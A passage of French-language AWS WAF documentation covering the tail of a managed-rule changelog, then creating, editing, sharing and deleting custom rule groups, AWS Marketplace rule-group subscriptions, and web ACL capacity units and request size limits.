| Protection de l'administrateur | `AdminProtection_URIPATH`  | Ajout d'un double décodage d'URL.  | 03/03/2021 | 
| Entrées erronées connues | `ExploitablePaths_URIPATH`  | Amélioration de la configuration des règles et ajout d'un décodage d'URL supplémentaire.  | 03/03/2021 | 
| Système d'exploitation Linux | `LFI_QUERYARGUMENTS`  | Amélioration de la configuration des règles et ajout d'un décodage d'URL supplémentaire.  | 03/03/2021 | 
| Système d'exploitation Windows | Tous | Amélioration de la configuration des règles.  | 2020-09-23 | 
| Application PHP | `PHPHighRiskMethodsVariables_QUERYARGUMENTS` `PHPHighRiskMethodsVariables_BODY`  | Modification de la transformation du texte du décodage HTML au décodage URL, afin d'améliorer le blocage.  | 16/09/2020 | 
| Système d'exploitation POSIX | `UNIXShellCommandsVariables_QUERYARGUMENTS` `UNIXShellCommandsVariables_BODY`  | Modification de la transformation du texte du décodage HTML au décodage URL, afin d'améliorer le blocage.  | 16/09/2020 | 
| Ensemble de règles de base | `GenericLFI_QUERYARGUMENTS` `GenericLFI_URIPATH` GenericLFI\$1BODY  | Modification de la transformation du texte du décodage HTML au décodage URL, afin d'améliorer le blocage.  | 2020-08-07 | 
| Système d'exploitation Linux | `LFI_URIPATH` `LFI_QUERYARGUMENTS` `LFI_BODY`  | Changement de la transformation de texte du décodage d'entité HTML au décodage d'URL, afin d'améliorer la détection et le blocage.  | 19/05/2020 | 
| Liste des adresses IP anonymes | Tous | Nouveau groupe de règles visant [Groupes de règles de réputation IP](aws-managed-rule-groups-ip-rep.md) à bloquer les demandes provenant de services qui permettent de masquer l'identité des utilisateurs, afin de limiter les robots et de contourner les restrictions géographiques.  | 06/03/2020 | 
| WordPress candidature | `WordPressExploitableCommands_QUERYSTRING`  | Nouvelle règle qui vérifie les commandes exploitables dans la chaîne de requête. | 03/03/2020 | 
| Ensemble de règles de base (CRS) | `SizeRestrictions_QUERYSTRING` `SizeRestrictions_Cookie_HEADER` `SizeRestrictions_BODY` `SizeRestrictions_URIPATH`  | Ajustement des contraintes de valeur de taille pour améliorer la précision.  | 03/03/2020 | 
| Base de données SQL | `SQLi_URIPATH`  | Les règles vérifient maintenant l'URI du message. | 23/01/2020 | 
| Base de données SQL | `SQLi_BODY` `SQLi_QUERYARGUMENTS` `SQLi_COOKIE`  | Transformations de texte mises à jour. | 2019-12-20 | 
| Ensemble de règles de base (CRS) | `CrossSiteScripting_URIPATH` `CrossSiteScripting_BODY` `CrossSiteScripting_QUERYARGUMENTS` `CrossSiteScripting_COOKIE`  | Transformations de texte mises à jour. | 2019-12-20 | 

# Gestion de vos propres groupes de règles
<a name="waf-user-created-rule-groups"></a>

Vous pouvez créer votre propre groupe de règles pour réutiliser des collections de règles que vous ne trouvez pas dans les offres de groupes de règles gérées ou que vous préférez gérer vous-même. 

Les groupes de règles que vous créez contiennent des règles comme le fait un pack de protection (ACL Web), et vous ajoutez des règles à un groupe de règles de la même manière que vous le faites à un pack de protection (ACL Web). Lorsque vous créez votre propre groupe de règles, vous devez définir une capacité maximale immuable pour celui-ci. 

**Topics**
+ [Création d'un groupe de règles](waf-rule-group-creating.md)
+ [Modification d'un groupe de règles](waf-rule-group-editing.md)
+ [Utilisation de votre groupe de règles dans un pack de protection (ACL Web)](waf-rule-group-using.md)
+ [Suppression d'un groupe de règles](waf-rule-group-deleting.md)
+ [Partage d'un groupe de règles](waf-rule-group-sharing.md)

# Création d'un groupe de règles
<a name="waf-rule-group-creating"></a>

Pour créer un nouveau groupe de règles, suivez la procédure décrite sur cette page. 

**Pour créer un groupe de règles**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Dans le panneau de navigation, choisissez **Groupes de règles**, puis **Créer un groupe de règles**. 

1. Saisissez un nom et une description pour le groupe de règles. Vous les utiliserez pour identifier l'ensemble de règles permettant de le gérer et de l'utiliser. 

   N'utilisez pas de noms commençant par `AWS``Shield`,`PreFM`, ou`PostFM`. Ces chaînes sont réservées ou peuvent prêter à confusion avec les groupes de règles gérés pour vous par d'autres services. Consultez [Reconnaissance des groupes de règles fournis par d'autres services](waf-service-owned-rule-groups.md). 
**Note**  
Vous ne pouvez pas modifier le nom une fois que vous créez la liste ACL web.

1. Pour **Région**, choisissez la région dans laquelle vous souhaitez stocker le groupe de règles. Pour utiliser un groupe de règles dans les packs de protection (Web ACLs) qui protègent les CloudFront distributions Amazon, vous devez utiliser le paramètre global. Vous pouvez également utiliser le paramètre global pour les applications régionales.

1. Choisissez **Suivant**.

1. Ajoutez des règles au groupe de règles à l'aide de l'**assistant de création de règles**, comme vous le faites pour la gestion des packs de protection (ACL Web). La seule différence est que vous ne pouvez pas ajouter un groupe de règles à un autre groupe de règles. 

1. Pour **Capacité**, définissez le maximum pour l'utilisation par le groupe de règles des unités de capacité du pack de protection (ACL WebWCUs) (). Paramètre immuable. Pour plus d'informations sur WCUs, voir[Unités de capacité Web ACL (WCUs) en AWS WAF](aws-waf-capacity-units.md). 

   Lorsque vous ajoutez des règles au groupe de règles, le panneau **Ajouter des règles et définir la capacité** affiche la capacité minimale requise, qui est basée sur les règles que vous avez déjà ajoutées. Vous pouvez l'utiliser ainsi que vos plans futurs pour le groupe de règles, et vous aider ainsi à estimer la capacité dont le groupe de règles aura besoin. 

1. Vérifiez les paramètres du groupe de règles, puis choisissez **Créer**.

# Modification d'un groupe de règles
<a name="waf-rule-group-editing"></a>

Pour ajouter ou supprimer des règles dans un groupe de règles ou modifier les paramètres de configuration, accédez au groupe de règles en suivant la procédure décrite sur cette page. 

**Risque lié au trafic de production**  
Si vous modifiez un groupe de règles que vous utilisez actuellement dans un pack de protection (ACL Web), ces modifications affecteront le comportement de votre pack de protection (ACL Web) quel que soit l'endroit où il est utilisé. Assurez-vous de tester et d'ajuster toutes les modifications dans un environnement de test ou de test jusqu'à ce que vous soyez à l'aise avec l'impact potentiel sur votre trafic. Testez et ajustez ensuite vos règles mises à jour en mode décompte en fonction de votre trafic de production avant de les activer. Pour de plus amples informations, consultez [Tester et ajuster vos AWS WAF protections](web-acl-testing.md).

**Pour modifier un groupe de règles**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Dans le volet de navigation, sélectionnez **Groupes de règles**.

1. Choisissez le nom du groupe de règles que vous souhaitez modifier. La console vous amène à la page du groupe de règles. 
**Note**  
Si vous ne trouvez pas le groupe de règles que vous souhaitez modifier, vérifiez la sélection de la région dans la section **Groupes de règles**. Pour les groupes de règles utilisés pour protéger les CloudFront distributions Amazon, utilisez le paramètre **Global (CloudFront)**. 

1. Modifiez le groupe de règles selon vos besoins. Vous pouvez modifier les propriétés modifiables du groupe de règles, comme vous l'avez fait lors de sa création. La console enregistre vos modifications au fur et à mesure.
**Note**  
Si vous modifiez le nom d'une règle et que vous souhaitez que le nom de la métrique de la règle reflète le changement, vous devez également mettre à jour le nom de la métrique. AWS WAF ne met pas automatiquement à jour le nom de la métrique d'une règle lorsque vous modifiez le nom de la règle. Vous pouvez modifier le nom de la métrique lorsque vous modifiez la règle dans la console, à l'aide de l'éditeur JSON de règles. Vous pouvez également modifier les deux noms via APIs et dans toute liste JSON que vous utilisez pour définir votre pack de protection (ACL Web) ou votre groupe de règles.

**Incohérences temporaires lors des mises à jour**  
Lorsque vous créez ou modifiez un pack de protection (ACL Web) ou d'autres AWS WAF ressources, les modifications mettent peu de temps à se propager à toutes les zones où les ressources sont stockées. Le temps de propagation peut aller de quelques secondes à plusieurs minutes. 

Voici des exemples d'incohérences temporaires que vous pourriez remarquer lors de la propagation des modifications : 
+ Après avoir créé un pack de protection (ACL Web), si vous essayez de l'associer à une ressource, vous pouvez obtenir une exception indiquant que le pack de protection (ACL Web) n'est pas disponible. 
+ Une fois que vous avez ajouté un groupe de règles à un pack de protection (ACL Web), les nouvelles règles du groupe de règles peuvent être en vigueur dans une zone où le pack de protection (ACL Web) est utilisé et pas dans une autre.
+ Une fois que vous avez modifié le paramètre d'une action de règle, vous pouvez voir l'ancienne action à certains endroits et la nouvelle action à d'autres. 
+ Après avoir ajouté une adresse IP à un ensemble d'adresses IP utilisé dans une règle de blocage, la nouvelle adresse peut être bloquée dans une zone alors qu'elle est toujours autorisée dans une autre.

# Utilisation de votre groupe de règles dans un pack de protection (ACL Web)
<a name="waf-rule-group-using"></a>

Pour utiliser un groupe de règles dans un pack de protection (ACL Web), vous l'ajoutez au pack de protection (ACL Web) dans une déclaration de référence de groupe de règles. 

**Risque lié au trafic de production**  
Avant de déployer des modifications dans votre pack de protection (ACL Web) pour le trafic de production, testez-les et ajustez-les dans un environnement intermédiaire ou de test jusqu'à ce que vous soyez à l'aise avec l'impact potentiel sur votre trafic. Testez et ajustez ensuite vos règles mises à jour en mode décompte avec votre trafic de production avant de les activer. Pour de plus amples informations, consultez [Tester et ajuster vos AWS WAF protections](web-acl-testing.md).

**Note**  
L'utilisation de plus de 1 500 unités WCUs dans un pack de protection (ACL Web) entraîne des coûts supérieurs au prix du pack de protection de base (ACL Web). Pour plus d'informations, veuillez consulter les sections [Unités de capacité Web ACL (WCUs) en AWS WAF](aws-waf-capacity-units.md) et [Tarification d'AWS WAF](https://aws.amazon.com/waf/pricing/).

**Pour utiliser un groupe de règles**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Dans le volet de navigation, sélectionnez **Groupes de règles**.

1. Choisissez le nom du groupe de règles que vous souhaitez utiliser.

1. Choisissez **Ajouter des règles**, puis sélectionnez **Ajouter mes propres règles et groupes de règles**.

1. Choisissez **Groupe de règles** et sélectionnez votre groupe de règles dans la liste. 

Dans votre pack de protection (ACL Web), vous pouvez modifier le comportement d'un groupe de règles et ses règles en définissant les actions de règle individuelles sur Count ou toute autre action. Cela peut vous aider à tester un groupe de règles, à identifier les faux positifs à partir des règles d'un groupe de règles et à personnaliser la façon dont un groupe de règles géré traite vos demandes. Pour de plus amples informations, veuillez consulter [Remplacer les actions du groupe de règles dans AWS WAF](web-acl-rule-group-override-options.md). 

Si votre groupe de règles contient une instruction basée sur le taux, chaque pack de protection (ACL Web) dans lequel vous utilisez le groupe de règles possède son propre suivi et sa propre gestion des taux pour la règle basée sur le taux, indépendamment de tout autre pack de protection (ACL Web) dans lequel vous utilisez le groupe de règles. Pour de plus amples informations, veuillez consulter [Utilisation d'instructions de règles basées sur le taux dans AWS WAF](waf-rule-statement-type-rate-based.md).

**Incohérences temporaires lors des mises à jour**  
Lorsque vous créez ou modifiez un pack de protection (ACL Web) ou d'autres AWS WAF ressources, les modifications mettent peu de temps à se propager à toutes les zones où les ressources sont stockées. Le temps de propagation peut aller de quelques secondes à plusieurs minutes. 

Voici des exemples d'incohérences temporaires que vous pourriez remarquer lors de la propagation des modifications : 
+ Après avoir créé un pack de protection (ACL Web), si vous essayez de l'associer à une ressource, vous pouvez obtenir une exception indiquant que le pack de protection (ACL Web) n'est pas disponible. 
+ Une fois que vous avez ajouté un groupe de règles à un pack de protection (ACL Web), les nouvelles règles du groupe de règles peuvent être en vigueur dans une zone où le pack de protection (ACL Web) est utilisé et pas dans une autre.
+ Après avoir modifié un paramètre d'action d'une règle, vous pouvez voir l'ancienne action à certains endroits et la nouvelle action à d'autres. 
+ Après avoir ajouté une adresse IP à un ensemble d'adresses IP utilisé dans une règle de blocage, la nouvelle adresse peut être bloquée dans une zone alors qu'elle est toujours autorisée dans une autre.

# Suppression d'un groupe de règles
<a name="waf-rule-group-deleting"></a>

Suivez les instructions de cette section pour supprimer un groupe de règles.

**Suppression d'ensembles et de groupes de règles référencés**  
Lorsque vous supprimez une entité que vous pouvez utiliser dans un pack de protection (ACL Web), comme un ensemble d'adresses IP, un ensemble de modèles regex ou un groupe de règles, AWS WAF vérifie si l'entité est actuellement utilisée dans un pack de protection (ACL Web). S'il constate qu'il est en cours d'utilisation, il vous AWS WAF avertit. AWS WAF est presque toujours capable de déterminer si une entité est référencée par un pack de protection (ACL Web). Cependant, dans de rares cas, il peut ne pas être en mesure de le faire. Si vous devez vous assurer que rien n'utilise actuellement l'entité, vérifiez-la dans vos packs de protection (Web ACLs) avant de la supprimer. Si l'entité est un ensemble référencé, vérifiez également qu'aucun groupe de règles ne l'utilise.

**Pour supprimer un groupe de règles**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Dans le volet de navigation, sélectionnez **Groupes de règles**.

1. Sélectionnez le groupe de règles que vous voulez supprimer et choisissez **Supprimer**.
**Note**  
Si vous ne trouvez pas le groupe de règles que vous souhaitez supprimer, vérifiez la sélection de la région dans la section **Groupes de règles**. Pour les groupes de règles utilisés pour protéger les CloudFront distributions Amazon, utilisez le paramètre **Global (CloudFront)**. 

# Partage d'un groupe de règles
<a name="waf-rule-group-sharing"></a>

Vous pouvez partager un groupe de règles avec d'autres comptes, afin qu'ils puissent l'utiliser. 

**Partage d'un groupe de règles**  
Vous pouvez partager avec un ou plusieurs comptes spécifiques, et vous pouvez partager avec tous les comptes d'une organisation. 

Pour partager un groupe de règles, vous utilisez l' AWS WAF API pour créer une politique pour le partage de groupe de règles que vous souhaitez. Pour plus d’informations, consultez [PutPermissionPolicy](https://docs.aws.amazon.com/waf/latest/APIReference/API_PutPermissionPolicy.html) dans la *Référence d’API AWS WAF *.

**Utilisation d'un groupe de règles qui a été partagé avec vous**  
Si un groupe de règles a été partagé avec votre compte, vous pouvez y accéder via l'API et vous pouvez le référencer lorsque vous créez ou mettez à jour vos packs de protection (Web ACLs) via l'API. Pour plus d'informations [GetRuleGroup](https://docs.aws.amazon.com/waf/latest/APIReference/API_GetRuleGroup.html), voir ACL et [CreateWeb[UpdateWebACL](https://docs.aws.amazon.com/waf/latest/APIReference/API_UpdateWebACL.html)](https://docs.aws.amazon.com/waf/latest/APIReference/API_CreateWebACL.html) dans le manuel de *référence des AWS WAF API*. Les groupes de règles partagés avec vous n'apparaissent pas dans la liste des groupes de règles de votre AWS WAF console. 

# AWS Marketplace groupes de règles
<a name="marketplace-rule-groups"></a>

Cette section explique comment utiliser les groupes de AWS Marketplace règles.

AWS Marketplace les groupes de règles sont disponibles par abonnement via la AWS Marketplace console à l'adresse [AWS Marketplace](https://aws.amazon.com/marketplace). Une fois que vous êtes abonné à un groupe de AWS Marketplace règles, vous pouvez l'utiliser dans AWS WAF. Pour utiliser un groupe de AWS Marketplace règles dans une AWS Firewall Manager AWS WAF politique, chaque compte de votre organisation doit y souscrire. 

**Vous pouvez vous abonner à différents types de groupes de règles par le biais de AWS Marketplace :**
+ AWS WAF groupes de règles gérés par les partenaires
+ Protections côté client

Testez et ajustez les modifications apportées à vos AWS WAF protections avant de les utiliser pour le trafic de production. Pour plus d'informations, consultez [Tester et ajuster vos AWS WAF protections](web-acl-testing.md).

**AWS Marketplace Tarification par groupes de règles**  
AWS Marketplace les groupes de règles sont disponibles sans contrat à long terme et sans engagement minimum. Lorsque vous vous abonnez à un groupe de règles, des frais mensuels (calculés au prorata de l'heure) et des frais de demande permanents basés sur le volume vous sont facturés. Toutefois, les frais d'abonnement ne vous sont facturés que lorsque vous ajoutez le groupe de règles auquel vous êtes abonné à une ACL Web et que vous commencez à l'utiliser. Pour plus d'informations, consultez la section [AWS WAF Tarification](https://aws.amazon.com/waf/pricing/) et la description de chaque groupe de AWS Marketplace règles à l'adresse [AWS Marketplace](https://aws.amazon.com/marketplace).

**Vous avez des questions concernant un groupe de AWS Marketplace règles ?**  
Pour toute question concernant un groupe de règles géré par un AWS Marketplace vendeur et pour demander des modifications de fonctionnalités, contactez l'équipe du support client du fournisseur. Pour trouver les coordonnées, consultez la liste du fournisseur à l'adresse [AWS Marketplace](https://aws.amazon.com/marketplace).

Le fournisseur du groupe de AWS Marketplace règles détermine comment gérer le groupe de règles, par exemple comment le mettre à jour et si le groupe de règles est versionné. Le fournisseur détermine également les détails du groupe de règles, notamment les règles, les actions des règles et les étiquettes que les règles ajoutent aux requêtes Web correspondantes. 

## Abonnement à des groupes de AWS Marketplace règles
<a name="marketplace-rule-groups-subscribing"></a>

Vous pouvez vous abonner à des groupes de AWS Marketplace règles et vous en désabonner sur la AWS WAF console. 

**Important**  
Pour utiliser un groupe de AWS Marketplace règles dans une AWS Firewall Manager politique, chaque compte de votre organisation doit d'abord s'abonner à ce groupe de règles. 

**Pour s'abonner à un groupe de AWS Marketplace règles**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Dans le volet de navigation, sélectionnez **Protections supplémentaires**.

1. Dans la **AWS Marketplace**section, choisissez le nom d'un groupe de règles pour afficher les détails et les informations de tarification.
**Astuce**  
Utilisez les filtres pour trier rapidement les règles qui vous intéressent le plus. Par exemple, vous pouvez utiliser le filtre de **catégorie** pour afficher uniquement les protections côté client.

1. Pour vous abonner à un groupe de AWS Marketplace règles : 

   1. Accédez à un groupe de règles, puis choisissez **Subscribe via Marketplace**.

   1. Sur la page Marketplace qui s'ouvre, choisissez **Afficher les options d'achat**, puis **Subscribe**.
**Note**  
Si vous décidez de ne pas vous abonner au groupe de règles, fermez simplement la fenêtre contextuelle.

Une fois que vous êtes abonné à un groupe de AWS Marketplace règles, vous l'utilisez dans vos packs de protection (Web ACLs) comme dans les autres groupes de règles gérés. Pour plus d'informations, consultez [Création d'un pack de protection (ACL Web) dans AWS WAF](web-acl-creating.md). 

Lorsque vous ajoutez un groupe de règles à un pack de protection (ACL Web), vous pouvez annuler les actions des règles du groupe de règles et du résultat du groupe de règles. Pour de plus amples informations, veuillez consulter [Remplacer les actions du groupe de règles dans AWS WAF](web-acl-rule-group-override-options.md). 

## Se désabonner des groupes de règles AWS Marketplace
<a name="marketplace-rule-groups-unsubscribing"></a>

Vous pouvez vous désabonner des groupes de AWS Marketplace règles sur la AWS Marketplace console.

**Important**  
Pour arrêter les frais d'abonnement pour un groupe de AWS Marketplace règles, vous devez le supprimer de tous les packs de protection (Web ACLs) inclus dans AWS WAF et dans toutes AWS WAF les politiques de Firewall Manager, en plus de vous désabonner de celui-ci. Si vous vous désinscrivez d'un groupe de AWS Marketplace règles mais que vous ne le supprimez pas de vos packs de protection (Web ACLs), l'abonnement continuera de vous être facturé. 

**Pour se désabonner d'un groupe de AWS Marketplace règles**

1. Supprimez le groupe de règles de tous les packs de protection (Web ACLs). Pour de plus amples informations, veuillez consulter [Modification d'un pack de protection (ACL Web) dans AWS WAF](web-acl-editing.md).

1. Ouvrez la AWS console à l'adresse [https://console.aws.amazon.com/marketplace.](https://console.aws.amazon.com/marketplace)

   La **page Gérer les abonnements apparaît**.

1. Ouvrez la liste des **modes de livraison** et choisissez **SaaS**.

1. Sous **Accord**, ouvrez la **liste des actions** et choisissez **Annuler l'abonnement** à côté du nom du groupe de règles dont vous souhaitez vous désabonner.

1. Dans la boîte de dialogue **Annuler l'abonnement**, entrez**confirm**, puis choisissez **Oui, annuler l'abonnement**.

## Groupes de AWS Marketplace règles de résolution des problèmes
<a name="waf-managed-rule-group-troubleshooting"></a>

Si vous constatez qu'un groupe de AWS Marketplace règles bloque le trafic légitime, vous pouvez résoudre le problème en effectuant les étapes suivantes.

**Pour résoudre les problèmes liés à un groupe de AWS Marketplace règles**

1. Remplacez les actions pour qu'elles soient prises en compte dans les règles qui bloquent le trafic légitime. Vous pouvez identifier les règles bloquant des demandes spécifiques à l'aide des exemples AWS WAF de demandes ou AWS WAF des journaux. Vous pouvez identifier les règles en regardant le champ `ruleGroupId` dans le journal ou le champ `RuleWithinRuleGroup` dans la demande échantillonnée. Vous pouvez identifier la règle dans le modèle`<Seller Name>#<RuleGroup Name>#<Rule Name>`.

1. Si la définition de règles spécifiques pour ne compter que les demandes ne résout pas le problème, vous pouvez annuler toutes les actions des règles ou modifier l'action du groupe de AWS Marketplace règles lui-même de **Aucune dérogation à **Remplacer**** pour compter. La demande web peut ainsi passer, quelles que soient les actions des règles au sein du groupe de règles. 

1. Après avoir annulé l'action de règle individuelle ou l'action de groupe de AWS Marketplace règles complète, contactez l'équipe d'assistance client du fournisseur du groupe de règles pour résoudre le problème plus en détail. Pour les coordonnées, consultez la liste du groupe de règles sur les pages de liste produit sur AWS Marketplace.

### Contacter le AWS support
<a name="waf-managed-rule-group-troubleshooting-support"></a>

Pour tout problème AWS WAF lié à un groupe de règles géré par celui-ci AWS, contactez AWS Support. En cas de problème avec un groupe de règles géré par un AWS Marketplace vendeur, contactez l'équipe du support client du fournisseur. Pour trouver les informations de contact, consultez la liste du fournisseur sur AWS Marketplace.

# Reconnaissance des groupes de règles fournis par d'autres services
<a name="waf-service-owned-rule-groups"></a>

Si vous ou un administrateur de votre organisation utilisez AWS Firewall Manager ou gérez la protection des ressources AWS Shield Advanced à l'aide de cette AWS WAF méthode, des déclarations de référence aux groupes de règles peuvent être ajoutées aux packs de protection (Web ACLs) de votre compte. 

Les noms de ces groupes de règles commencent par les chaînes suivantes : 
+ **`ShieldMitigationRuleGroup`**— Ces groupes de règles sont gérés AWS Shield Advanced et utilisés pour fournir une atténuation automatique de la couche d'application DDo S aux ressources de la couche d'application protégée (couche 7). 

  Lorsque vous activez l'atténuation automatique de la couche DDo S de l'application pour une ressource protégée, Shield Advanced ajoute l'un de ces groupes de règles au pack de protection (ACL Web) que vous avez associé à la ressource. Shield Advanced attribue à l'instruction de référence du groupe de règles un paramètre de priorité de 10 000 000, de sorte qu'elle s'exécute conformément aux règles que vous avez configurées dans le pack de protection (ACL Web). Pour plus d'informations sur ces groupes de règles, consultez[Automatiser l'atténuation de la couche DDo S de l'application avec Shield Advanced](ddos-automatic-app-layer-response.md).
**Avertissement**  
N'essayez pas de gérer manuellement ce groupe de règles dans votre pack de protection (ACL Web). En particulier, ne supprimez pas manuellement la déclaration de référence du groupe de `ShieldMitigationRuleGroup` règles de votre pack de protection (ACL Web). Cela pourrait avoir des conséquences imprévues sur toutes les ressources associées au pack de protection (ACL Web). Utilisez plutôt Shield Advanced pour désactiver l'atténuation automatique des ressources associées au pack de protection (ACL Web). Shield Advanced supprimera le groupe de règles pour vous lorsqu'il n'est pas nécessaire pour une atténuation automatique.
+ **`PREFMManaged`et `POSTFMManaged`** — Ces groupes de règles sont gérés en AWS Firewall Manager fonction des configurations de AWS WAF politique de Firewall Manager. Firewall Manager fournit ces groupes de règles dans des packs de protection (Web ACLs) gérés par Firewall Manager. 

  Firewall Manager crée pour vous des packs de protection (Web ACLs) dont les noms commencent par`FMManagedWebACLV2`. Vous pouvez également configurer Firewall Manager pour moderniser vos packs de protection existants (Web ACLs). Pour ceux-ci, le nom du pack de protection (ACL Web) est celui que vous avez spécifié lors de sa création. Dans les deux cas, Firewall Manager ajoutera ces groupes de règles au pack de protection (ACL Web). Pour de plus amples informations, veuillez consulter [Utilisation AWS WAF de politiques avec Firewall Manager](waf-policies.md).

# Unités de capacité Web ACL (WCUs) en AWS WAF
<a name="aws-waf-capacity-units"></a>

Cette section explique ce que sont les unités de capacité ACL Web (WCUs) et comment elles fonctionnent.

AWS WAF permet WCUs de calculer et de contrôler les ressources d'exploitation nécessaires à l'exécution de vos règles, de vos groupes de règles et du Web ACLs. AWS WAF applique les limites de la WCU lorsque vous configurez vos groupes de règles et votre site Web. ACLs WCUs n'affectent pas la façon dont le trafic AWS WAF Web est inspecté. 

AWS WAF gère la capacité des règles, des groupes de règles et du Web ACLs. 

**Règle WCUs**  
AWS WAF calcule la capacité des règles lorsque vous créez ou mettez à jour une règle. AWS WAF calcule la capacité différemment pour chaque type de règle, afin de refléter le coût relatif de chaque règle. Les règles simples dont l'exécution est peu coûteuse sont WCUs moins gourmandes que les règles plus complexes qui utilisent plus de puissance de traitement. Par exemple, une instruction de règle de contrainte de taille utilise WCUs moins qu'une instruction qui inspecte les demandes à l'aide d'un ensemble de modèles regex. 

Les exigences en matière de capacité des règles commencent généralement par un coût de base pour le type de règle et augmentent avec la complexité, par exemple, lorsque vous ajoutez des transformations de texte avant l'inspection ou si vous inspectez le corps du fichier JSON. Pour plus d'informations sur les exigences de capacité des règles, consultez les listes des instructions de règles à l'adresse[Utilisation d'instructions de règle dans AWS WAF](waf-rule-statements.md). 

**Groupe de règles WCUs**  
Les exigences WCU pour un groupe de règles sont déterminées par les règles que vous définissez au sein du groupe de règles. La capacité maximale d'un groupe de règles est de 5 000 personnes WCUs. 

Chaque groupe de règles possède un paramètre de capacité immuable, que le propriétaire attribue lors de sa création. Cela est vrai pour les groupes de règles gérés et les groupes de règles que vous créez via AWS WAF. Lorsque vous modifiez un groupe de règles, vos modifications doivent respecter les capacités du WCUs groupe de règles. Cela garantit que les packs de protection (Web ACLs) ou Web ACLs qui utilisent le groupe de règles respectent leurs exigences en matière de capacité. 

Les WCUs valeurs utilisées dans un groupe de règles sont la somme des règles WCUs pour moins les optimisations de traitement pouvant être obtenues en combinant le comportement des règles. AWS WAF Par exemple, si vous définissez deux règles pour examiner le même composant de requête Web et que les règles appliquent chacune une transformation particulière au composant avant de l'inspecter, vous pourrez AWS WAF peut-être vous facturer une seule fois pour l'application de la transformation. Le coût WCU lié à l'utilisation d'un groupe de règles dans un pack de protection (ACL Web) est toujours le paramètre WCU fixe que vous avez défini lors de la création du groupe de règles. 

Lorsque vous créez un groupe de règles, veillez à définir une capacité suffisamment élevée pour tenir compte des règles que vous souhaiterez utiliser pendant toute la durée de vie du groupe de règles. 

**Pack de protection ou ACL Web WCUs**  
Les exigences WCU pour un pack de protection (ACL Web) sont déterminées par les règles et les groupes de règles que vous utilisez dans le pack de protection (ACL Web). 
+ Le coût d'utilisation d'un groupe de règles dans un pack de protection (ACL Web) est le paramètre de capacité du groupe de règles. 
+ Le coût d'utilisation d'une règle correspond au calcul de la règle, WCUs déduction faite des optimisations de traitement pouvant être AWS WAF obtenues à partir de la combinaison de règles du pack de protection (ACL Web). Par exemple, si vous définissez deux règles pour examiner le même composant de requête Web et que les règles appliquent chacune une transformation particulière au composant avant de l'inspecter, vous pourrez AWS WAF peut-être vous facturer une seule fois pour l'application de la transformation. 

Le prix de base d'un pack de protection (ACL Web) inclut jusqu'à 1 500€ WCUs. L'utilisation de plus de 1 500 WCUs unités entraîne des frais supplémentaires, selon un modèle de tarification échelonnée. AWS WAF ajuste automatiquement le prix de votre pack de protection (ACL Web) en fonction de l'évolution de l'utilisation de la WCU par votre pack de protection (ACL Web). Pour plus d'informations sur la tarification, consultez la page [AWS WAF Pricing](https://aws.amazon.com/waf/pricing/) (Tarification). 

La capacité maximale d'un pack de protection (ACL Web) est de 5 000 WCUs. 

## Déterminer la valeur WCUs d'un groupe de règles, d'un pack de protection (ACL Web) ou d'une ACL Web
<a name="aws-waf-capacity-units-used"></a>

Comme indiqué dans les sections précédentes, le total WCUs utilisé dans un groupe de règles, un pack de protection (ACL Web) ou une ACL Web sera égal *ou inférieur* à la WCUs somme de toutes les règles définies dans le groupe de règles, le pack de protection (ACL Web) ou l'ACL Web.

Dans la AWS WAF console, vous pouvez voir la capacité consommée lorsque vous ajoutez des règles à votre pack de protection (ACL Web), à votre ACL Web ou à votre groupe de règles. La console affiche les unités de capacité actuellement utilisées lorsque vous ajoutez les règles. 

Grâce à l'API, vous pouvez vérifier les exigences de capacité maximale pour les règles que vous souhaitez utiliser dans un pack de protection (ACL Web), une ACL Web ou un groupe de règles. Pour ce faire, fournissez la liste JSON des règles à l'appel de vérification de capacité. Pour plus d'informations, consultez [CheckCapacity](https://docs.aws.amazon.com/waf/latest/APIReference/API_CheckCapacity.html)la *référence de l'API AWS WAF V2*.

# Composants de requête Web surdimensionnés dans AWS WAF
<a name="waf-oversize-request-components"></a>

Cette section explique comment gérer les limites de taille lors de l'inspection du corps de la requête Web, des en-têtes et des cookies. AWS WAF

AWS WAF ne prend pas en charge l'inspection de contenus très volumineux pour le corps des composants de la requête Web, les en-têtes ou les cookies. Le service hôte sous-jacent est soumis à des limites de nombre et de taille pour ce qu'il transmet à AWS WAF des fins d'inspection. Par exemple, le service hôte n'envoie pas plus de 200 en-têtes à. Par conséquent AWS WAF, pour une requête Web contenant 205 en-têtes, AWS WAF vous ne pouvez pas inspecter les 5 derniers en-têtes. 

Lorsque AWS WAF vous autorisez une requête Web à accéder à votre ressource protégée, l'intégralité de la demande Web est envoyée, y compris tout contenu dépassant les limites de nombre et de taille qui ont AWS WAF pu être inspectées. 

**Limites de taille pour l'inspection des composants**  
Les limites de taille d'inspection des composants sont les suivantes : 
+ **`Body`et `JSON Body`** — Pour Application Load Balancer et AWS AppSync, AWS WAF peut inspecter les 8 premiers Ko du corps d'une demande. Par défaut CloudFront, API Gateway, Amazon Cognito, App Runner et Verified Access AWS WAF peuvent inspecter les 16 premiers Ko, et vous pouvez augmenter la limite jusqu'à 64 Ko dans la configuration de votre pack de protection (ACL Web). Pour de plus amples informations, veuillez consulter [Considérations relatives à la gestion de l'inspection corporelle dans AWS WAF](web-acl-setting-body-inspection-limit.md). 
